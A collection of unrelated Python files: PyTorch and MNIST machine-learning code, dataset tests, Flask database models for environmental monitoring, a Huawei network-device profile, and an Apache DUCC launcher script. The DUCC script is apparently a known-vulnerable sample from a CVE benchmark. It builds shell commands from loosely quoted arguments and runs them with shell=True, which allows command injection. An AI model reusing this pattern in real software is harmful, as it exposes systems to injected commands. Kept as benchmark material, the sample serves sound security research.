# if not votes:
# new_vote = Votes(vote=vote_type, user_id=current_user.id, pitches_id=id)
# new_vote.save_vote()
# # print(len(count_likes))
# print('YOU HAVE VOTED')
# for vote in votes:
# if f'{vote}' == to_str:
# print('YOU CANNOT VOTE MORE THAN ONCE')
# break
# else:
# new_vote = Votes(vote=vote_type, user_id=current_user.id, pitches_id=id)
# new_vote.save_vote()
# print('YOU HAVE VOTED')
# break
# # count_likes = Votes.query.filter_by(pitches_id=id, vote=1).all()
# # upvotes=len(count_likes)
# # count_dislikes = Votes.query.filter_by(pitches_id=id, vote=2).all()
# return redirect(url_for('.view_pitch', id=id))
|
# Copyright (c) 2019, Myrtle Software Limited. All rights reserved.
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from typing import Optional, Tuple
def rnn(rnn, input_size, hidden_size, num_layers, norm=None,
forget_gate_bias=1.0, dropout=0.0, **kwargs):
"""TODO"""
if rnn != "lstm":
raise ValueError(f"Unknown rnn={rnn}")
if norm not in [None]:
raise ValueError(f"unknown norm={norm}")
if rnn == "lstm":
return LstmDrop(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
dropout=dropout,
forget_gate_bias=forget_gate_bias,
**kwargs
)
class LstmDrop(torch.nn.Module):
def __init__(self, input_size, hidden_size, num_layers, dropout, forget_gate_bias,
**kwargs):
"""Returns an LSTM with forget gate bias init to `forget_gate_bias`.
Args:
input_size: See `torch.nn.LSTM`.
hidden_size: See `torch.nn.LSTM`.
num_layers: See `torch.nn.LSTM`.
dropout: See `torch.nn.LSTM`.
forget_gate_bias: For each layer and each direction, the total value of
to initialise the forget gate bias to.
Returns:
A `torch.nn.LSTM`.
"""
super(LstmDrop, self).__init__()
self.lstm = torch.nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
dropout=dropout,
)
if forget_gate_bias is not None:
for name, v in self.lstm.named_parameters():
if "bias_ih" in name:
bias = getattr(self.lstm, name)
bias.data[hidden_size:2 * hidden_size].fill_(forget_gate_bias)
if "bias_hh" in name:
bias = getattr(self.lstm, name)
bias.data[hidden_size:2 * hidden_size].fill_(0)
if dropout:
self.inplace_dropout = torch.nn.Dropout(dropout, inplace=True)
else:
self.inplace_droput = None
def forward(self, x: torch.Tensor,
h: Optional[Tuple[torch.Tensor, torch.Tensor]] = None):
x, h = self.lstm(x, h)
if self.inplace_dropout is not None:
self.inplace_dropout(x.data)
return x, h
class StackTime(torch.nn.Module):
__constants__ = ["factor"]
def __init__(self, factor):
super().__init__()
self.factor = int(factor)
def forward(self, x, x_lens):
# T, B, U
r = torch.transpose(x, 0, 1)
s = r.shape
zeros = torch.zeros(
s[0], (-s[1]) % self.factor, s[2], dtype=r.dtype, device=r.device)
r = torch.cat([r, zeros], 1)
s = r.shape
rs = [s[0], s[1] // self.factor, s[2] * self.factor]
r = torch.reshape(r, rs)
rt = torch.transpose(r, 0, 1)
x_lens = torch.ceil(x_lens.float() / self.factor).int()
return rt, x_lens
|
from pytest import raises
import pytest
def test_register():
from DeSSL.data import SEMI_DATASET_REGISTRY
from DeSSL import loadding_config
parser = loadding_config('config/base.yml')
args = parser.parse_args([])
semi_cifar = SEMI_DATASET_REGISTRY(
'semi_cifar10')(args.root, args.num_labels_per_class)
train_loader, test_loader, classes = semi_cifar(
args.batch_size, num_workers=args.num_workers)
for label, unlabel in train_loader:
label_data, label_target = label
unlabel_data, unlabel_target = unlabel
assert list(label_data.shape) == [args.batch_size, 3, 32, 32]
break
for data, target in test_loader:
assert list(data.shape) == [args.batch_size * 2, 3, 32, 32]
break
assert classes == args.num_classes
def test_data():
from DeSSL.data import SemiDataset, semi_cifar10
from torchvision.datasets import CIFAR10
from torchvision import transforms as tf
from DeSSL import loadding_config
parser = loadding_config('config/base.yml')
args = parser.parse_args([])
semi_cifar = SemiDataset(args.root, args.num_labels_per_class, CIFAR10,
args.num_classes, tf.ToTensor(), tf.ToTensor(), tf.ToTensor())
train_loader, test_loader, classes = semi_cifar(
args.batch_size, num_workers=args.num_workers)
for label, unlabel in train_loader:
label_data, label_target = label
unlabel_data, unlabel_target = unlabel
assert list(label_data.shape) == [args.batch_size, 3, 32, 32]
break
for data, target in test_loader:
assert list(data.shape) == [args.batch_size * 2, 3, 32, 32]
break
assert classes == args.num_classes
semi_cifar = semi_cifar10(args.root, args.num_labels_per_class)
train_loader, test_loader, classes = semi_cifar(
args.batch_size, num_workers=args.num_workers)
for label, unlabel in train_loader:
label_data, label_target = label
unlabel_data, unlabel_target = unlabel
assert list(label_data.shape) == [args.batch_size, 3, 32, 32]
break
for data, target in test_loader:
assert list(data.shape) == [args.batch_size * 2, 3, 32, 32]
break
assert classes == args.num_classes
def test_include_labeled_data():
from DeSSL.data import SemiDataset
from torchvision.datasets import MNIST
from torchvision import transforms as tf
from DeSSL import loadding_config
parser = loadding_config('config/base.yml')
args = parser.parse_args([])
mnist = MNIST(args.root)
semi_mnist = SemiDataset(args.root, args.num_labels_per_class, MNIST,
args.num_classes, tf.ToTensor(), tf.ToTensor(), tf.ToTensor())
assert len(semi_mnist.unlabel_dataset) == len(mnist)
uninclude_semi_mnist = SemiDataset(args.root, args.num_labels_per_class, MNIST, args.num_classes, tf.ToTensor(
), tf.ToTensor(), tf.ToTensor(), include_labeled_data=False)
assert len(uninclude_semi_mnist.unlabel_dataset) + \
len(uninclude_semi_mnist.label_dataset) == len(mnist)
def test_import_data():
with raises(ImportError):
from DeSSL import SemiDataset, semi_mnist
|
<reponame>jentjr/envirobase
import json
from . import db
import pandas as pd
from datetime import datetime
from geoalchemy2 import functions
from geoalchemy2.types import Geometry
from flask import current_app, request, url_for
from .errors import AlreadyExistsError
class BaseExtension(db.MapperExtension):
"""Base extension for all entities."""
def before_insert(self, mapper, connection, instance):
instance.created_on = datetime.now()
def before_update(self, mapper, connection, instance):
instance.updated_on = datetime.now()
class BaseEntity(object):
__mapper_args__ = {"extension": BaseExtension()}
created_on = db.Column(db.DateTime)
updated_on = db.Column(db.DateTime)
class Facility(db.Model, BaseEntity):
__tablename__ = "facility"
facility_id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text, nullable=False, unique=True)
type = db.Column(db.Text)
address = db.Column(db.Text)
city = db.Column(db.Text)
state = db.Column(db.CHAR(2))
zipcode = db.Column(db.String)
longitude = db.Column(db.Float, nullable=True)
latitude = db.Column(db.Float, nullable=True)
geometry = db.Column(Geometry(geometry_type="POINT", srid=4326))
storage_tank = db.relationship("StorageTank", back_populates="facility")
waste_unit = db.relationship("WasteUnit", back_populates="facility")
def __repr__(self):
return f"Facility('{self.facility_id}','{self.name}', '{self.address}', '{self.city}','{self.state}', '{self.zipcode}')"
@classmethod
def add_facility(cls, name, address, city, state, zipcode, longitude, latitude):
"""Add a new facility in the database."""
geometry = "POINT({} {})".format(longitude, latitude)
facility = Facility(
name=name,
address=address,
city=city,
state=state,
zipcode=zipcode,
longitude=longitude,
latitude=latitude,
geometry=geometry,
)
db.session.add(facility)
db.session.commit()
@classmethod
def update_geometries(cls):
"""Using each facility's longitude and latitude, add geometry data to db."""
facilities = Facility.query.all()
for facility in facilities:
point = "POINT({} {})".format(facility.longitude, facility.latitude)
facility.geometry = point
db.session.commit()
def to_json(self):
json_facility = {
"url": url_for("api.get_facility", facility_id=self.facility_id),
"name": self.name,
"address": self.address,
"city": self.city,
"state": self.state,
"zipcode": self.zipcode,
"longitude": self.longitude,
"latitude": self.latitude,
}
return json_facility
@staticmethod
def from_json(json_facility):
name = json_facility.get("name")
address = json_facility.get("address")
city = json_facility.get("city")
state = json_facility.get("state")
zipcode = json_facility.get("zipcode")
longitude = json_facility.get("longitude")
latitude = json_facility.get("latitude")
if name is None or name == "":
raise ValidationError("Facility must have a name")
return Facility(
name=name,
address=address,
city=city,
state=state,
zipcode=zipcode,
longitude=longitude,
latitude=latitude,
created_on=datetime.utcnow()
# geometry = "POINT({} {})".format(longitude, latitude)
)
class WasteUnit(db.Model, BaseEntity):
__tablename__ = "waste_unit"
__table_args__ = (db.UniqueConstraint("name", "facility_id"),)
unit_id = db.Column(db.Integer, primary_key=True)
facility_id = db.Column(db.Integer, db.ForeignKey("facility.facility_id"))
name = db.Column(db.String(64), nullable=False)
constructed_date = db.Column(db.Date)
geometry = db.Column(Geometry(geometry_type="POLYGON", srid=4326))
unit_type = db.Column(db.String(12), nullable=False)
facility = db.relationship("Facility", back_populates="waste_unit")
__mapper_args__ = {
"polymorphic_identity": "waste_unit",
"polymorphic_on": unit_type,
}
def __repr__(self):
return f"WasteUnit('{self.name}')"
def to_json(self):
json_waste_unit = {
"url": url_for("api.get_waste_unit", unit_id=self.unit_id),
"name": self.name,
"constructed_date": self.constructed_date,
"unit_type": self.unit_type,
}
return json_waste_unit
class Landfill(WasteUnit, BaseEntity):
__tablename__ = "landfill"
permit_id = db.Column(db.String(24))
__mapper_args__ = {"polymorphic_identity": "landfill"}
def __repr__(self):
return f"Landfill('{self.name}')"
def to_json(self):
json_landfill = {
"url": url_for("api.get_landfill", unit_id=self.unit_id),
"name": self.name,
}
return json_landfill
class Impoundment(WasteUnit, BaseEntity):
__tablename__ = "impoundment"
dam_id = db.Column(db.String(24))
hazard_class = db.Column(db.Text)
__mapper_args__ = {"polymorphic_identity": "impoundment"}
def __repr__(self):
return f"Impoundment('{self.dam_id}', '{self.name}', '{self.hazard_class}')"
def to_json(self):
json_impoundment = {
"url": url_for("api.get_impoundment", unit_id=self.unit_id),
"name": self.name,
}
return json_impoundment
class StorageTank(db.Model, BaseEntity):
"""Base class for UndergroundStorageTank and AbovegroundStorageTank classes using Joined Table Inheritance. When StorageTank is queried only columns in this class are returned."""
__tablename__ = "storage_tank"
__table_args__ = (db.UniqueConstraint("tank_registration_id", "facility_id"),)
tank_id = db.Column(db.Integer, primary_key=True)
tank_registration_id = db.Column(db.String(12))
facility_id = db.Column(db.Integer, db.ForeignKey("facility.facility_id"))
date_installed = db.Column(db.Date)
date_removed = db.Column(db.Date)
capacity = db.Column(db.Integer)
stored_substance = db.Column(db.String(64))
status = db.Column(db.String(10))
longitude = db.Column(db.Float)
latitude = db.Column(db.Float)
geometry = db.Column(Geometry(geometry_type="POINT", srid=4326))
tank_type = db.Column(db.String(3), nullable=False)
facility = db.relationship("Facility", back_populates="storage_tank")
__mapper_args__ = {
"polymorphic_identity": "storage_tank",
"polymorphic_on": tank_type,
}
def __repr__(self):
return f"StorageTank('{self.tank_id}', '{self.tank_type}', '{self.stored_substance}', '{self.status}')"
def to_json(self):
json_storage_tank = {
"url": url_for("api.get_storage_tank", tank_id=self.tank_id),
"facility": self.facility.name,
"tank_registration_id": self.tank_registration_id,
"capacity": self.capacity,
"stored_substance": self.stored_substance,
"status": self.status,
"tank_type": self.tank_type,
"longitude": self.longitude,
"latitude": self.latitude,
}
return json_storage_tank
@staticmethod
def from_json(json_storage_tank):
facility_id = json_storage_tank.get("facility_id")
tank_registration_id = json_storage_tank.get("tank_registration_id")
capacity = json_storage_tank.get("capacity")
stored_substance = json_storage_tank.get("stored_substance")
status = json_storage_tank.get("status")
tank_type = json_storage_tank.get("tank_type")
longitude = json_storage_tank.get("longitude")
latitude = json_storage_tank.get("latitude")
if facility_id is None or facility_id == "":
raise ValidationError("Tank must be associated with a Facility")
return StorageTank(
facility_id=facility_id,
tank_registration_id=tank_registration_id,
capacity=capacity,
stored_substance=stored_substance,
status=status,
tank_type=tank_type,
longitude=longitude,
latitude=latitude,
created_on=datetime.utcnow()
# geometry = "POINT({} {})".format(longitude, latitude)
)
class UndergroundStorageTank(StorageTank, BaseEntity):
"""Subclass to StorageTank with Joined Table Inheritance. When UndergroundStorageTank is queried all columns from StorageTank are inherited."""
__tablename__ = "ust"
__mapper_args__ = {"polymorphic_identity": "ust"}
tank_double_wall = db.Column(db.Boolean)
inner_tank_material = db.Column(db.Text)
outer_tank_material = db.Column(db.Text)
tank_leak_detection = db.Column(db.Text)
tank_corrosion_protection = db.Column(db.Text)
tank_monitoring_system = db.Column(db.Text)
piping_double_wall = db.Column(db.Boolean)
piping_type = db.Column(db.Text) # Pressurized or suction
inner_pipe_material = db.Column(db.Text)
outer_pipe_material = db.Column(db.Text)
piping_corrosion_protection = db.Column(db.Text)
spill_protection = db.Column(db.Text)
overflow_protection = db.Column(db.Text)
def __repr__(self):
return f"UndergroundStorageTank('{self.tank_id}', '{self.tank_type}', '{self.stored_substance}', '{self.status}')"
def to_json(self):
json_ust = {
"url": url_for("api.get_ust", tank_id=self.tank_id),
"capacity": self.capacity,
"stored_substance": self.stored_substance,
}
return json_ust
class AbovegroundStorageTank(StorageTank, BaseEntity):
"""Subclass to StorageTank with Joined Table Inheritance. When AbovegroundStorageTank is queried all columns from StorageTank are inherited."""
__tablename__ = "ast"
__mapper_args__ = {"polymorphic_identity": "ast"}
def __repr__(self):
return f"AbovegroundStorageTank('{self.tank_id}', '{self.tank_type}', '{self.stored_substance}', '{self.status}')"
def to_json(self):
json_ast = {
"url": url_for("api.get_ast", tank_id=self.tank_id),
"capacity": self.capacity,
"stored_substance": self.stored_substance,
}
return json_ast
class MediumCode(db.Model, BaseEntity):
__tablename__ = "medium_code"
medium_cd = db.Column(db.String(3), primary_key=True)
medium_name = db.Column(db.String(64))
medium_description = db.Column(db.Text)
legacy_cd = db.Column(db.CHAR(1))
def __init__(self, **kwargs):
super(MediumCode, self).__init__(**kwargs)
def _insert_medium_codes():
"""Inserts USGS Medium Codes. If the codes have already been entered, an error is thrown."""
if MediumCode.query.first():
raise AlreadyExistsError("Medium Codes have already been entered.")
else:
url = "https://help.waterdata.usgs.gov/medium_cd"
df = pd.read_html(url, header=0, converters={0: str})[0]
df.rename(
index=str,
columns={
"Medium Code": "medium_cd",
"Medium Name": "medium_name",
"Medium Description": "medium_description",
"Medium Legacy Code": "legacy_cd",
},
inplace=True,
)
df.to_sql("medium_code", con=db.engine, if_exists="append", index=False)
class SampleParameter(db.Model, BaseEntity):
__tablename__ = "sample_parameter"
__table_args__ = (
db.CheckConstraint(
"param_cd ~ similar_escape('[[:digit:]]{5}'::text, NULL::text)"
),
)
param_cd = db.Column(db.CHAR(5), primary_key=True)
group_name = db.Column(db.Text)
description = db.Column(db.Text)
epa_equivalence = db.Column(db.Text)
statistical_basis = db.Column(db.Text)
time_basis = db.Column(db.Text)
weight_basis = db.Column(db.Text)
particle_size_basis = db.Column(db.Text)
sample_fraction = db.Column(db.Text)
temperature_basis = db.Column(db.Text)
casrn = db.Column(db.Text)
srsname = db.Column(db.Text)
parameter_unit = db.Column(db.Text)
def __init__(self, **kwargs):
super(SampleParameter, self).__init__(**kwargs)
def _insert_param_codes():
"""Inserts USGS Parameter Codes. If the codes have already been entered, an error is thrown."""
if SampleParameter.query.first():
raise AlreadyExistsError("Parameter Codes have already been entered.")
else:
url = "https://help.waterdata.usgs.gov/parameter_cd?group_cd=%"
df = pd.read_html(url, header=0, converters={0: str})[0]
df.rename(
index=str,
columns={
"Parameter Code": "param_cd",
"Group Name": "group_name",
"Parameter Name/Description": "description",
"Epa equivalence": "epa_equivalence",
"Result Statistical Basis": "statistical_basis",
"Result Time Basis": "time_basis",
"Result Weight Basis": "weight_basis",
"Result Particle Size Basis": "particle_size_basis",
"Result Sample Fraction": "sample_fraction",
"Result Temperature Basis": "temperature_basis",
"CASRN": "casrn",
"SRSName": "srsname",
"Parameter Unit": "parameter_unit",
},
inplace=True,
)
df.to_sql(
"sample_parameter", con=db.engine, if_exists="append", index=False
)
class SampleId(db.Model, BaseEntity):
__tablename__ = "sample_id"
__table_args__ = (db.UniqueConstraint("sample_id", "facility_id"),)
sample_id = db.Column(db.Integer, primary_key=True)
facility_id = db.Column(db.Integer, db.ForeignKey("facility.facility_id"))
sample_name = db.Column(db.Text)
description = db.Column(db.Text)
longitude = db.Column(db.Float, nullable=True)
latitude = db.Column(db.Float, nullable=True)
geometry = db.Column(Geometry(geometry_type="POINT", srid=4326))
sample_type = db.Column(db.String(24))
facility = db.relationship("Facility")
__mapper_args__ = {
"polymorphic_identity": "sample_id",
"polymorphic_on": sample_type,
}
def __repr__(self):
return f"SampleId('{self.sample_id}', '{self.facility.name}', '{self.sample_type}')"
def to_json(self):
json_sample_location = {
"url": url_for("api.get_sample_id", sample_id_id=self.sample_id),
"facility": self.facility.name,
"sample_id": self.sample_id,
"sample_type": self.sample_type,
}
return json_sample_id
@staticmethod
def from_json(json_sample_location):
facility = json_sample_location.get("facility.name")
sample_id = json_sample_location.get("sample_id")
sample_type = json_sample_location.get("sample_type")
if location_id is None or location_id == "":
raise ValidationError("Sample does not have an ID")
return SampleId(sample_id=sample_id, sample_type=sample_type)
class Boring(db.Model, BaseEntity):
__tablename__ = "boring"
boring_id = db.Column(db.Text, primary_key=True)
start_date = db.Column(db.Date)
end_date = db.Column(db.Date)
class Well(SampleId, BaseEntity):
__tablename__ = "well"
__mapper_args__ = {"polymorphic_identity": "monitoring_well"}
well_id = db.Column(db.Text)
boring_id = db.Column(db.Text, db.ForeignKey("boring.boring_id"))
well_type = db.Column(db.String(10))
installation_date = db.Column(db.Date)
abandoned_date = db.Column(db.Date)
top_riser = db.Column(db.Float)
top_bent_seal = db.Column(db.Float)
top_gravel_pack = db.Column(db.Float)
top_screen = db.Column(db.Float)
bottom_screen = db.Column(db.Float)
bottom_well = db.Column(db.Float)
bottom_gravel_pack = db.Column(db.Float)
bottom_boring = db.Column(db.Float)
grout_seal_desc = db.Column(db.Text)
bent_seal_desc = db.Column(db.Text)
screen_type = db.Column(db.Text)
gravel_pack_desc = db.Column(db.Text)
riser_pipe_desc = db.Column(db.Text)
spacer_depths = db.Column(db.Text)
notes = db.Column(db.Text)
boring = db.relationship("Boring")
def __repr__(self):
return f"MonitoringWell('{self.well_id}')"
def to_json(self):
json_monitoring_well = {
"url": url_for("api.get_monitoring_well", well_id=self.well_id),
"top_screen": self.top_screen,
"bottom_screen": self.bottom_screen,
}
return json_monitoring_well
class SampleResult(db.Model, BaseEntity):
__tablename__ = "sample_result"
__table_args__ = (
db.UniqueConstraint(
"lab_id", "sample_id", "sample_date", "param_cd", "analysis_result"
),
db.CheckConstraint(
"param_cd ~ similar_escape('[[:digit:]]{5}'::text, NULL::text)"
),
)
result_id = db.Column(db.Integer, primary_key=True)
lab_id = db.Column(db.Text)
facility_id = db.Column(db.Integer, db.ForeignKey("facility.facility_id"))
sample_id = db.Column(db.Integer, db.ForeignKey("sample_id.sample_id"))
param_cd = db.Column(db.CHAR(5), db.ForeignKey("sample_parameter.param_cd"))
medium_cd = db.Column(db.String(3), db.ForeignKey("medium_code.medium_cd"))
sample_date = db.Column(db.Date, nullable=False)
sample_time = db.Column(db.Time, nullable=True)
prep_method = db.Column(db.Text)
analysis_method = db.Column(db.Text, nullable=True)
analysis_flag = db.Column(db.CHAR(1), nullable=True)
analysis_result = db.Column(db.Float, nullable=True)
analysis_unit = db.Column(db.Text, nullable=False)
detection_limit = db.Column(db.Float)
reporting_limit = db.Column(db.Float)
analysis_qualifier = db.Column(db.CHAR(1))
disclaimer = db.Column(db.Text)
analysis_date = db.Column(db.DateTime)
order_comment = db.Column(db.Text)
analysis_comment = db.Column(db.Text)
sample = db.relationship("SampleId")
medium_code = db.relationship("MediumCode")
sample_parameter = db.relationship("SampleParameter")
facility = db.relationship("Facility")
def __repr__(self):
return f"SampleResult('{self.result_id}')"
def to_json(self):
json_sample_result = {
"url": url_for("api.get_sample_result", result_id=self.result_id),
"lab_id": self.lab_id,
}
return json_sample_result
|
# -*- coding: utf-8 -*-
import os
import numpy as np
from sklearn.datasets import fetch_mldata
import npdl
def get_data():
# data
print("loading data, please wait ...")
mnist = fetch_mldata('MNIST original', data_home=os.path.join(os.path.dirname(__file__), './data'))
print('data loading is done ...')
X_train = mnist.data / 255.0
y_train = mnist.target
n_classes = np.unique(y_train).size
return n_classes, X_train, y_train
def main(max_iter):
n_classes, X_train, y_train = get_data()
# model
print("building model ...")
model = npdl.Model()
model.add(npdl.layers.Dense(n_out=200, n_in=784, activation=npdl.activations.ReLU()))
model.add(npdl.layers.Dense(n_out=n_classes, activation=npdl.activations.Softmax()))
model.compile(loss=npdl.objectives.SCCE(), optimizer=npdl.optimizers.SGD())
# train
print("train model ... ")
model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter, validation_split=0.1)
def main2(max_iter):
# test Momentum optimizer
n_classes, X_train, y_train = get_data()
# model
print("building model ...")
model = npdl.Model()
model.add(npdl.layers.Dense(n_out=200, n_in=784, activation=npdl.activations.ReLU()))
model.add(npdl.layers.Dense(n_out=n_classes, activation=npdl.activations.Softmax()))
model.compile(loss=npdl.objectives.SCCE(), optimizer=npdl.optimizers.Momentum())
# train
print("train model ... ")
model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter, validation_split=0.1)
def main3(max_iter):
# test NesterovMomentum optimizer
n_classes, X_train, y_train = get_data()
# model
print("building model ...")
model = npdl.Model()
model.add(npdl.layers.Dense(n_out=200, n_in=784, activation='relu'))
model.add(npdl.layers.Softmax(n_out=n_classes))
model.compile(loss=npdl.objectives.SCCE(), optimizer=npdl.optimizers.NesterovMomentum())
# train
print("train model ... ")
model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter, validation_split=0.1)
def main4(max_iter):
# test Adagrad optimizer
n_classes, X_train, y_train = get_data()
# model
print("building model ...")
model = npdl.Model()
model.add(npdl.layers.Dense(n_out=100, n_in=784, activation='relu'))
model.add(npdl.layers.Softmax(n_out=n_classes))
model.compile(loss='scce', optimizer='adagrad')
# train
print("train model ... ")
model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter, validation_split=0.1)
def main5(max_iter):
# test RMSProp optimizer
n_classes, X_train, y_train = get_data()
# model
print("building model ...")
model = npdl.Model()
model.add(npdl.layers.Dense(n_out=100, n_in=784, activation='relu'))
model.add(npdl.layers.Softmax(n_out=n_classes))
model.compile(loss='scce', optimizer='rmsprop')
# train
print("train model ... ")
model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter, validation_split=0.1)
def main6(max_iter):
# test Adadelta optimizer
n_classes, X_train, y_train = get_data()
# model
print("building model ...")
model = npdl.Model()
model.add(npdl.layers.Dense(n_out=100, n_in=784, activation='relu'))
model.add(npdl.layers.Softmax(n_out=n_classes))
model.compile(loss='scce', optimizer='adadelta')
# train
print("train model ... ")
model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter, validation_split=0.1)
def main7(max_iter):
# test Adam optimizer
n_classes, X_train, y_train = get_data()
# model
print("building model ...")
model = npdl.Model()
model.add(npdl.layers.Dense(n_out=100, n_in=784, activation='relu'))
model.add(npdl.layers.Softmax(n_out=n_classes))
model.compile(loss='scce', optimizer='adam')
# train
print("train model ... ")
model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter, validation_split=0.1)
def main8(max_iter):
# test Adamax optimizer
n_classes, X_train, y_train = get_data()
# model
print("building model ...")
model = npdl.Model()
model.add(npdl.layers.Dense(n_out=100, n_in=784, activation='relu'))
model.add(npdl.layers.Softmax(n_out=n_classes))
model.compile(loss='scce', optimizer='adamax')
# train
print("train model ... ")
model.fit(X_train, npdl.utils.data.one_hot(y_train), max_iter=max_iter, validation_split=0.1)
if __name__ == '__main__':
main8(50)
|
# ---------------------------------------------------------------------
# Vendor: Huawei
# OS: MA5300
# ---------------------------------------------------------------------
# Copyright (C) 2007-2020 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import re
# NOC modules
from noc.core.profile.base import BaseProfile
class Profile(BaseProfile):
name = "Huawei.MA5300"
pattern_more = [
(rb"--- More:", b" "),
(rb"[ ]+---- More \(Press CTRL\+C break\) ---[ ]+", b" "), # [ ]+ use for save \n in output
# stream, because more pattern remove from stream
(rb"Note: Terminal", b"\n"),
(rb"Warning: Battery is low power!", b"\n"),
(rb"\{\s<cr>.*\s\}:", b"\n"),
(rb"^Are you sure?\[Y/N\]", b"y\n"),
(rb"^\{ terminal\<K\> \}\:", b"terminal\n"),
(rb"\{ <cr>\|interface<K> \}\:", b"\n"),
]
pattern_username = rb"^Username:"
pattern_password = rb"^Password:"
command_exit = "logout"
command_super = b"enable"
command_enter_config = "configure terminal"
command_leave_config = "end"
command_save_config = "save"
enable_cli_session = False # With False mixin commands output over script
pattern_prompt = rb"(?P<hostname>\S+)(?:\(.*)?#"
pattern_unprivileged_prompt = rb"^(?P<hostname>[a-zA-Z0-9-_\.\/()]+)(?:-[a-zA-Z0-9/]+)*>$"
pattern_syntax_error = (
rb"(% Unknown command, the error locates at \'^\'| Logged Fail!|"
rb"System is busy, please try after a while)"
)
rogue_chars = [
re.compile(br"\x1b\[39D\s+\x1b\[39D"),
re.compile(br"\n\r\s+Line \d+ operating, attempt of the Line -\d+ denied!\n\r"),
re.compile(br"\r\n\s+Note: Terminal users login \(IP: \S+ \)"),
re.compile(br"\r\nWarning: Battery is low power!"),
b"\r",
]
# to one SNMP GET request
snmp_metrics_get_chunk = 30
# Timeout for snmp GET request
snmp_metrics_get_timeout = 5
# to one SNMP GET request for get_interface_status_ex
snmp_ifstatus_get_chunk = 30
# Timeout for snmp GET request for get_interface_status_ex
snmp_ifstatus_get_timeout = 3
_IF_TYPES = {
"aux": "other",
"loo": "loopback",
"m-e": "management",
"nul": "null",
"vla": "SVI",
}
@classmethod
def get_interface_type(cls, name):
return cls._IF_TYPES.get(name[:3].lower(), "unknown")
def get_interface_snmp_index(self, name):
return None
# def setup_session(self, script):
# script.cli("terminal type vt100", ignore_errors=True)
# script.cli("config", ignore_errors=True)
# script.cli("line vty 0 3", ignore_errors=True)
# script.cli("history size 0", ignore_errors=True)
# script.cli("length 0", ignore_errors=True)
# script.cli("exit", ignore_errors=True)
# script.cli("cls", ignore_errors=True)
# def shutdown_session(self, script):
# script.cli("config", ignore_errors=True)
# script.cli("line vty 0 3", ignore_errors=True)
# script.cli("no length 0", ignore_errors=True)
# script.cli("exit", ignore_errors=True)
|
<reponame>ossf-cve-benchmark/CVE-2018-8035
#!/usr/bin/python
# -----------------------------------------------------------------------
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -----------------------------------------------------------------------
import os
import sys
import string
import subprocess
import re
import zipfile
import platform
from properties import *
def find_ducc_home():
# Infer DUCC_HOME from our location - no longer use a (possibly inaccurate) environment variable
me = os.path.abspath(__file__)
ndx = me.rindex('/')
ndx = me.rindex('/', 0, ndx)
DUCC_HOME = me[:ndx] # split from 0 to ndx
return DUCC_HOME
def find_localhost():
return os.uname()[1]
def which(file):
for p in os.environ["PATH"].split(":"):
if os.path.exists(p + "/" + file):
return p + "/" + file
return None
class DuccBase:
def read_properties(self):
if ( self.do_merge ):
self.merge_properties()
self.ducc_properties = Properties()
self.ducc_properties.put('ducc.home', self.DUCC_HOME)
self.ducc_properties.put('DUCC_HOME', self.DUCC_HOME)
self.ducc_properties.load(self.propsfile)
self.webserver_node = self.ducc_properties.get('ducc.ws.node')
self.jvm = self.ducc_properties.get('ducc.jvm')
def java(self):
return self.jvm
def java_home(self):
if ( os.environ.has_key('DUCC_POST_INSTALL') ):
return 'JAVA_HOME' # avoid npe during first-time setup
if ( self.system == 'Darwin' ):
self.jvm_home = "/Library/Java/Home"
else:
ndx = self.jvm.rindex('/')
ndx = self.jvm.rindex('/', 0, ndx)
self.jvm_home = self.jvm[:ndx]
return self.jvm_home
def version(self):
lines = self.popen(self.jvm, ' org.apache.uima.ducc.common.utils.Version')
line = lines.readline().strip()
return "DUCC Version", line
# simply spawn-and-forget using Python preferred mechanism
def spawn(self, *CMD):
cmd = ' '.join(CMD)
# print '**** spawn', cmd, '****'
ducc = subprocess.Popen(cmd, shell=True)
pid = ducc.pid
try:
status = os.waitpid(pid, 0)
except KeyboardInterrupt:
print 'KeyboardInterrupt'
except:
print "Unexpected exception: ", sys.exc_info()[0]
return pid
def popen(self, *CMD):
cmd = ' '.join(CMD)
#print 'POPEN:', cmd
proc = subprocess.Popen(cmd, bufsize=0, stdout=subprocess.PIPE, shell=True, stderr=subprocess.STDOUT)
return proc.stdout
def format_classpath(self, cp):
strings = cp.split(':')
for s in strings:
print s
def set_classpath(self):
ducc_home = self.DUCC_HOME
LIB = ducc_home + '/lib'
CLASSPATH = LIB + '/ducc-submit.jar'
os.environ['CLASSPATH'] = CLASSPATH
def mkargs(self, args):
'''
The cli needs to insure all args are fully quoted so the shell doesn't
lose the proper tokenization. This quotes everything.
'''
answer = []
for a in args:
arg = '"' + a + '"'
answer.append(arg)
return answer
def __init__(self, merge=False):
self.DUCC_HOME = find_ducc_home()
self.do_merge = merge
self.ducc_properties = None
self.system = platform.system()
self.jvm = None
self.webserver_node = 'localhost'
self.propsfile = self.DUCC_HOME + '/resources/ducc.properties'
self.localhost = find_localhost()
self.read_properties()
os.environ['JAVA_HOME'] = self.java_home()
self.set_classpath()
